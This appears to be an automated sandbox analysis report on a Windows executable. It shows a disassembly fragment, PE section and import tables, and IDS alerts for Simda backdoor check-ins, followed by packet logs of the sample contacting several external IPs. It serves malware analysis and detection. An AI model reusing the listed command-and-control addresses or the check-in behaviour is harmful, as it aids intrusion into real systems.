                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                          push 00000001h
                                                                                                                                                                                                          pop ebx
                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                          mov ebx, 0088689Fh
                                                                                                                                                                                                          mov ecx, ebx
                                                                                                                                                                                                          sub ecx, 0046C7EFh
                                                                                                                                                                                                          call dword ptr [ecx]
                                                                                                                                                                                                          mov eax, 000B3EA0h
                                                                                                                                                                                                          mov ebp, eax
                                                                                                                                                                                                          mov ebx, 003784B2h
                                                                                                                                                                                                          add ebp, ebx
                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                          mov dword ptr [0042BD80h], 00000000h
                                                                                                                                                                                                          mov ebx, dword ptr [0042BD80h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1a21c | 0xc8 | .vtzr
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x66000 | 0x2a078 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x91000 | 0x3ac | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x22640 | 0x1c | .fvH
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2b13 | 0x2c00 | a4d3b0ce94ad84ed9b2c4a969cc56c70 | False | 0.7213245738636364 | data | 6.3708778153510535 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.D | 0x4000 | 0x5395 | 0x400 | 0a4832bacfca532f98f82bc1cc110244 | False | 0.69921875 | data | 5.273643553772029 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.SC | 0xa000 | 0x1b67 | 0x800 | bb8ff8817aa8b7520a20564fd256b92f | False | 0.7783203125 | data | 6.022115319944559 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.Wp | 0xc000 | 0x2018 | 0x200 | 9611c8690e8bf17b251ef8b541ed1e18 | False | 0.123046875 | data | 0.6947806982136152 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.aS | 0xf000 | 0xa414 | 0x400 | d5ffc696fc4b630af8e12dfa1574f79c | False | 0.765625 | data | 6.148168693021462 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vtzr | 0x1a000 | 0x77dc | 0x1000 | 4f89745b1d45e480b7f984a37b2ca7cb | False | 0.421630859375 | data | 4.955037110529063 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.fvH | 0x22000 | 0x812d | 0x800 | c13d406df81dfb9974deaa5e7f3abd5c | False | 0.66162109375 | data | 5.533722089361082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2b000 | 0x40e1 | 0x4200 | 1198ccdd255c02df07ec9c1fcfac9f40 | False | 0.8023200757575758 | data | 6.722929764502196 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.Lx | 0x30000 | 0x40f8 | 0x200 | 46a7c2a4a48f130efa5331a91bf9e031 | False | 0.8359375 | data | 6.270861660546221 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.sOZF | 0x35000 | 0x2873 | 0x200 | f4b90d55380f914fc23bd3ebea3c4353 | False | 0.14453125 | data | 0.9511370466044033 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.h | 0x38000 | 0x2dd8e | 0x800 | d7507f29fab95163821d691fdda39111 | False | 0.59033203125 | data | 4.8672358493330465 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x66000 | 0x2a078 | 0x2a200 | 7ab61db470df553ddeddd538afefbc71 | False | 0.9833433790801187 | data | 7.982188426455354 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .reloc0x910000x3ac0x400d66b97b3d918ce38ba35c65e93106bb1False0.8583984375data6.404465099324306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x66178 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4160412757973734
RT_DIALOG | 0x67220 | 0x4c | data | English | United States | 0.9210526315789473
RT_RCDATA | 0x6726c | 0x28b94 | data | English | United States | 1.0003656986643006
RT_GROUP_ICON | 0x8fe00 | 0x14 | data | English | United States | 1.1
RT_VERSION | 0x8fe14 | 0x264 | data | English | United States | 0.5179738562091504
DLL | Import
KERNEL32.DLL | CreateDirectoryW, GetStartupInfoW, OpenWaitableTimerW, BeginUpdateResourceA, OpenEventA, DeleteAtom, CreateMailslotW, ReplaceFileA, CompareFileTime, ReadFile, GetCalendarInfoW, SetLocaleInfoA, GetLogicalDriveStringsA, GetLastError, SetPriorityClass, GetUserDefaultLangID, SearchPathA, GetTimeFormatW, GetModuleHandleA, lstrcpy, CreateFileA, QueryPerformanceCounter, EnumDateFormatsA, ReadDirectoryChangesW, GetMailslotInfo, GetProcAddress, GlobalFindAtomW, RaiseException, EnumTimeFormatsA, GetComputerNameA, FreeLibrary, GetFullPathNameW, OpenEventW, SetComputerNameW, GetLongPathNameW, GetNamedPipeInfo, GetHandleInformation, GetExpandedNameA, SetEvent
user32.dll | GetClassInfoA, LoadMenuIndirectA, CopyIcon, WinHelpA, EnumDesktopsA, SetActiveWindow, CreateDesktopA, GetSystemMetrics, CreatePopupMenu, BringWindowToTop, PeekMessageA, ClientToScreen, SetWindowRgn, GetDlgItemTextA, GetMenuInfo, GetClassLongA, IsMenu, FrameRect, LoadIconW, InsertMenuItemA, SetWindowLongW, GetFocus, GetCaretPos, DefWindowProcA, LoadBitmapW, EnumWindows, GetMenuStringW, MessageBoxIndirectA, EmptyClipboard, GetMenuItemID, GetWindowLongW, MonitorFromPoint, DestroyWindow, SetDlgItemTextW, CreateWindowExW, CharNextA, MessageBoxIndirectW, CreateAcceleratorTableA, GetDlgItemInt, SetCursor
GDI32.DLL | CreateEnhMetaFileW, GetMetaFileBitsEx, GetMapMode, CreateCompatibleBitmap, GetEnhMetaFileHeader, CreateBitmap, GetCharacterPlacementW, FrameRgn, SetSystemPaletteUse, GetCharABCWidthsFloatW, SelectObject, CreateDCA, CreateMetaFileW, SetBkColor, CreateFontW, ExtTextOutW, GetTextExtentExPointA, CreateScalableFontResourceW, EndDoc, CreateDIBitmap, GetEnhMetaFileDescriptionW
ADVAPI32.DLL | RegOpenKeyExA, RegDeleteKeyA, RegOpenKeyExW, RegOpenKeyW, RegDeleteValueA, RegDeleteKeyW, RegQueryValueA
shell32.dll | Shell_NotifyIconA, StrRChrW, StrRChrIA
oleaut32.dll | VarI2FromBool, VarR8Round, OleCreatePictureIndirect, VarUI4FromStr, SafeArrayAllocData, LHashValOfNameSys, VarDecAbs
OPENGL32.DLL | glFogiv
setupapi.dll | pSetupDoesUserHavePrivilege
WINMM.DLL | mmioClose, waveOutGetNumDevs, midiInGetDevCapsA, mciGetDeviceIDW, waveOutGetDevCapsA, mixerGetLineInfoA, auxGetDevCapsW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                                                                                                                                          2024-09-08T10:54:14.230499+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957354154.85.183.5080TCP
                                                                                                                                                                                                          2024-09-08T10:54:17.755314+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95705472.52.179.17480TCP
                                                                                                                                                                                                          2024-09-08T10:54:18.271431+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95705572.52.179.17480TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.494574070 CEST804971869.162.80.55192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.778433084 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.778804064 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.867319107 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.867351055 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.867752075 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.868098021 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.883246899 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.928502083 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.992845058 CEST8049719154.212.231.82192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.993021011 CEST4971980192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.994051933 CEST4971980192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.998943090 CEST8049719154.212.231.82192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043301105 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043315887 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043334007 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043345928 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043359995 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043373108 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043384075 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043382883 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043395996 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043406963 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043420076 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043421030 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043421030 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043442965 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043483019 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.048348904 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.048361063 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.048371077 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.048429012 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.048429012 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.140647888 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.140675068 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.140686989 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.140717030 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.140754938 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.140767097 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.140774012 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.140800953 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.140813112 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.140822887 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.140822887 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.140824080 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.140839100 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.140844107 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.140861034 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.140889883 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.141700029 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.141988993 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.406563997 CEST8049719154.212.231.82192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.406723976 CEST4971980192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.987540007 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.987597942 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.987611055 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.987637043 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.987649918 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.987673044 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.987682104 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.987687111 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.987709045 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.987734079 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.987736940 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.987826109 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.988004923 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.988039970 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.988044024 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.988078117 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.988101959 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.988143921 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.988763094 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.988780975 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.988810062 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.988816977 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.988831997 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.988857031 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.990000010 CEST4970780192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.994823933 CEST8049707188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:37.784790039 CEST8049707188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:37.784847975 CEST4970780192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:37.791208982 CEST49722443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:37.791258097 CEST44349722188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:37.791492939 CEST49722443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:37.791727066 CEST49722443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:37.791742086 CEST44349722188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:38.247487068 CEST44349722188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:38.247546911 CEST49722443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:38.250466108 CEST49722443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:38.250484943 CEST44349722188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:38.250760078 CEST44349722188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:38.250812054 CEST49722443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:38.251364946 CEST49722443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:38.292500019 CEST44349722188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:39.354537964 CEST44349722188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:39.354604006 CEST44349722188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:39.354631901 CEST49722443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:39.354646921 CEST44349722188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:39.354662895 CEST49722443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:39.354691029 CEST44349722188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:39.354703903 CEST49722443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:39.354707956 CEST44349722188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:39.354743958 CEST49722443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:20.318434000 CEST49746443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:20.318463087 CEST49746443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:20.412163019 CEST4974380192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:20.417123079 CEST8049743188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:20.757667065 CEST8049743188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:20.759479046 CEST4974380192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:20.764599085 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:20.764652967 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:20.764759064 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:20.765042067 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:20.765053034 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:21.232433081 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:21.232521057 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:21.234392881 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:21.234406948 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:21.234714985 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:21.234801054 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:21.235156059 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:21.276500940 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.337934017 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.337981939 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338017941 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338044882 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338044882 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338052988 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338076115 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338093996 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338093996 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338116884 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338152885 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338155985 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338170052 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338181973 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338198900 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338206053 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338238001 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338326931 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338594913 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338602066 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338620901 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338635921 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338654041 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338659048 CEST44349748188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:22.338697910 CEST49748443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:26.713579893 CEST800149747106.15.36.143192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:26.713654041 CEST497478001192.168.2.9106.15.36.143
                                                                                                                                                                                                          Sep 8, 2024 10:53:26.714858055 CEST4974580192.168.2.9103.150.11.230
                                                                                                                                                                                                          Sep 8, 2024 10:53:26.719687939 CEST8049745103.150.11.230192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.240425110 CEST8049745103.150.11.230192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.240510941 CEST4974580192.168.2.9103.150.11.230
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.241411924 CEST497478001192.168.2.9106.15.36.143
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.246273041 CEST800149747106.15.36.143192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.777810097 CEST800149747106.15.36.143192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.777869940 CEST497478001192.168.2.9106.15.36.143
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.131496906 CEST4975080192.168.2.964.225.91.73
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.136492014 CEST804975064.225.91.73192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.136559963 CEST4975080192.168.2.964.225.91.73
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.136703968 CEST4975080192.168.2.964.225.91.73
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.141506910 CEST804975064.225.91.73192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.247282028 CEST4975180192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.252095938 CEST8049751154.85.183.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.252190113 CEST4975180192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.252382994 CEST4975180192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.257181883 CEST8049751154.85.183.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.285410881 CEST4975280192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.293956995 CEST804975244.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.294048071 CEST4975280192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.294235945 CEST4975280192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.299123049 CEST804975244.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.727364063 CEST804975064.225.91.73192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.727514982 CEST4975080192.168.2.964.225.91.73
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.777215958 CEST804975244.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.777278900 CEST4975280192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.777296066 CEST804975244.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.777333021 CEST4975280192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.789267063 CEST4975280192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.794070959 CEST804975244.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.136063099 CEST8049751154.85.183.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.136127949 CEST4975180192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.137320995 CEST4975180192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.142168999 CEST8049751154.85.183.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.450045109 CEST8049751154.85.183.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.450109959 CEST4975180192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.862541914 CEST6079880192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.867328882 CEST8060798103.224.212.108192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.867408037 CEST6079880192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.867739916 CEST6079880192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.872512102 CEST8060798103.224.212.108192.168.2.9
